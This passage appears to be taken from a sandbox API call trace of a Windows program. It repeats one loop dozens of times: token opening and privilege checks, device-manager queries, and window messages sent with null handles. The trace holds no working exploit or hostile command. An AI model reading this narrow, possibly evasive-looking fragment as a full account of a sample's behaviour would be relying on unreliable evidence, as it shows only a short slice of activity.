pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.887] GetLastError () returned 0x578 [0016.887] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.887] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.887] GetCurrentThread () returned 0xfffffffe [0016.887] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.887] GetLastError () returned 0x3f0 [0016.887] GetCurrentProcess () returned 0xffffffff [0016.887] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.887] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.888] SetLastError (dwErrCode=0x522) [0016.888] CloseHandle (hObject=0x114) returned 1 [0016.888] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.888] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.888] GetLastError () returned 0x578 [0016.888] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.888] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.888] GetCurrentThread () returned 0xfffffffe [0016.888] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.888] GetLastError () returned 0x3f0 [0016.888] GetCurrentProcess () returned 0xffffffff [0016.888] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.888] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.888] SetLastError (dwErrCode=0x522) [0016.888] CloseHandle (hObject=0x114) returned 1 [0016.888] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.888] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.888] GetLastError () returned 0x578 [0016.888] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.888] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.888] GetCurrentThread () returned 0xfffffffe [0016.888] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.888] GetLastError () returned 0x3f0 [0016.888] GetCurrentProcess () returned 0xffffffff [0016.888] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.888] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.889] SetLastError (dwErrCode=0x522) [0016.889] CloseHandle (hObject=0x114) returned 1 [0016.889] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.889] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.889] GetLastError () returned 0x578 [0016.889] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.889] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.889] GetCurrentThread () returned 0xfffffffe [0016.889] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.889] GetLastError () returned 0x3f0 [0016.889] GetCurrentProcess () returned 0xffffffff [0016.889] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.889] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.889] SetLastError (dwErrCode=0x522) [0016.889] CloseHandle (hObject=0x114) returned 1 [0016.889] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.889] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.889] GetLastError () returned 0x578 [0016.889] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.889] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.889] GetCurrentThread () returned 0xfffffffe [0016.889] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.889] GetLastError () returned 0x3f0 [0016.889] GetCurrentProcess () returned 0xffffffff [0016.889] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.889] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.890] SetLastError (dwErrCode=0x522) [0016.890] CloseHandle (hObject=0x114) returned 1 [0016.890] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.890] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.890] GetLastError () returned 0x578 [0016.890] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.890] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.890] GetCurrentThread () returned 0xfffffffe [0016.890] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.890] GetLastError () returned 0x3f0 [0016.890] GetCurrentProcess () returned 0xffffffff [0016.890] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.890] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.890] SetLastError (dwErrCode=0x522) [0016.890] CloseHandle (hObject=0x114) returned 1 [0016.890] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.890] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.890] GetLastError () returned 0x578 [0016.890] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.890] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.890] GetCurrentThread () returned 0xfffffffe [0016.890] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.891] GetLastError () returned 0x3f0 [0016.892] GetCurrentProcess () returned 0xffffffff [0016.892] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.892] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.892] SetLastError (dwErrCode=0x522) [0016.892] CloseHandle (hObject=0x114) returned 1 [0016.892] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.892] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.892] GetLastError () returned 0x578 [0016.892] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.892] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.892] GetCurrentThread () returned 0xfffffffe [0016.892] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.892] GetLastError () returned 0x3f0 [0016.892] GetCurrentProcess () returned 0xffffffff [0016.892] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.892] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.892] SetLastError (dwErrCode=0x522) [0016.892] CloseHandle (hObject=0x114) returned 1 [0016.892] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.892] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.892] GetLastError () returned 0x578 [0016.892] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.892] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.892] GetCurrentThread () returned 0xfffffffe [0016.892] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.893] GetLastError () returned 0x3f0 [0016.893] GetCurrentProcess () returned 0xffffffff [0016.893] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.893] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.893] SetLastError (dwErrCode=0x522) [0016.893] CloseHandle (hObject=0x114) returned 1 [0016.893] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.893] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.893] GetLastError () returned 0x578 [0016.893] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.893] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.893] GetCurrentThread () returned 0xfffffffe [0016.893] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.893] GetLastError () returned 0x3f0 [0016.893] GetCurrentProcess () returned 0xffffffff [0016.893] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.893] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.893] SetLastError (dwErrCode=0x522) [0016.893] CloseHandle (hObject=0x114) returned 1 [0016.893] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.893] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.893] GetLastError () returned 0x578 [0016.893] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.893] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.893] GetCurrentThread () returned 0xfffffffe [0016.893] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.894] GetLastError () returned 0x3f0 [0016.894] GetCurrentProcess () returned 0xffffffff [0016.894] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.894] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.894] SetLastError (dwErrCode=0x522) [0016.894] CloseHandle (hObject=0x114) returned 1 [0016.894] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.894] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.894] GetLastError () returned 0x578 [0016.894] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.894] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.894] GetCurrentThread () returned 0xfffffffe [0016.894] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.894] GetLastError () returned 0x3f0 [0016.894] GetCurrentProcess () returned 0xffffffff [0016.894] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.894] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.894] SetLastError (dwErrCode=0x522) [0016.894] CloseHandle (hObject=0x114) returned 1 [0016.894] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.894] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.894] GetLastError () returned 0x578 [0016.894] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.894] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.894] GetCurrentThread () returned 0xfffffffe [0016.894] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.895] GetLastError () returned 0x3f0 [0016.895] GetCurrentProcess () returned 0xffffffff [0016.895] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.895] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.895] SetLastError (dwErrCode=0x522) [0016.895] CloseHandle (hObject=0x114) returned 1 [0016.895] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.895] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.895] GetLastError () returned 0x578 [0016.895] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.895] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.895] GetCurrentThread () returned 0xfffffffe [0016.895] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.895] GetLastError () returned 0x3f0 [0016.895] GetCurrentProcess () returned 0xffffffff [0016.895] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.895] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.895] SetLastError (dwErrCode=0x522) [0016.895] CloseHandle (hObject=0x114) returned 1 [0016.895] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.895] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.895] GetLastError () returned 0x578 [0016.895] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.895] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.895] GetCurrentThread () returned 0xfffffffe [0016.896] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.896] GetLastError () returned 0x3f0 [0016.896] GetCurrentProcess () returned 0xffffffff [0016.896] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.896] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.896] SetLastError (dwErrCode=0x522) [0016.896] CloseHandle (hObject=0x114) returned 1 [0016.896] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.896] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.896] GetLastError () returned 0x578 [0016.896] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.896] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.896] GetCurrentThread () returned 0xfffffffe [0016.896] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.896] GetLastError () returned 0x3f0 [0016.896] GetCurrentProcess () returned 0xffffffff [0016.896] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.896] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.896] SetLastError (dwErrCode=0x522) [0016.896] CloseHandle (hObject=0x114) returned 1 [0016.896] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.896] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.896] GetLastError () returned 0x578 [0016.896] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.896] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.897] GetCurrentThread () returned 0xfffffffe [0016.897] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.897] GetLastError () returned 0x3f0 [0016.897] GetCurrentProcess () returned 0xffffffff [0016.897] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.897] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.897] SetLastError (dwErrCode=0x522) [0016.897] CloseHandle (hObject=0x114) returned 1 [0016.897] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.897] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.897] GetLastError () returned 0x578 [0016.897] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.897] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.897] GetCurrentThread () returned 0xfffffffe [0016.897] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.897] GetLastError () returned 0x3f0 [0016.897] GetCurrentProcess () returned 0xffffffff [0016.897] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.897] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.897] SetLastError (dwErrCode=0x522) [0016.897] CloseHandle (hObject=0x114) returned 1 [0016.897] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.897] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.897] GetLastError () returned 0x578 [0016.897] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.898] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.898] GetCurrentThread () returned 0xfffffffe [0016.898] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.898] GetLastError () returned 0x3f0 [0016.898] GetCurrentProcess () returned 0xffffffff [0016.898] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.898] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.898] SetLastError (dwErrCode=0x522) [0016.898] CloseHandle (hObject=0x114) returned 1 [0016.898] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.898] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.898] GetLastError () returned 0x578 [0016.898] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.898] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.898] GetCurrentThread () returned 0xfffffffe [0016.898] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.898] GetLastError () returned 0x3f0 [0016.898] GetCurrentProcess () returned 0xffffffff [0016.898] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.898] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.898] SetLastError (dwErrCode=0x522) [0016.898] CloseHandle (hObject=0x114) returned 1 [0016.898] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.898] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.898] GetLastError () returned 0x578 [0016.899] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.899] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.899] GetCurrentThread () returned 0xfffffffe [0016.899] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.899] GetLastError () returned 0x3f0 [0016.899] GetCurrentProcess () returned 0xffffffff [0016.899] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.899] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.899] SetLastError (dwErrCode=0x522) [0016.899] CloseHandle (hObject=0x114) returned 1 [0016.899] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.899] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.899] GetLastError () returned 0x578 [0016.899] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.899] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.899] GetCurrentThread () returned 0xfffffffe [0016.899] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.899] GetLastError () returned 0x3f0 [0016.899] GetCurrentProcess () returned 0xffffffff [0016.899] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.899] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.899] SetLastError (dwErrCode=0x522) [0016.899] CloseHandle (hObject=0x114) returned 1 [0016.899] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 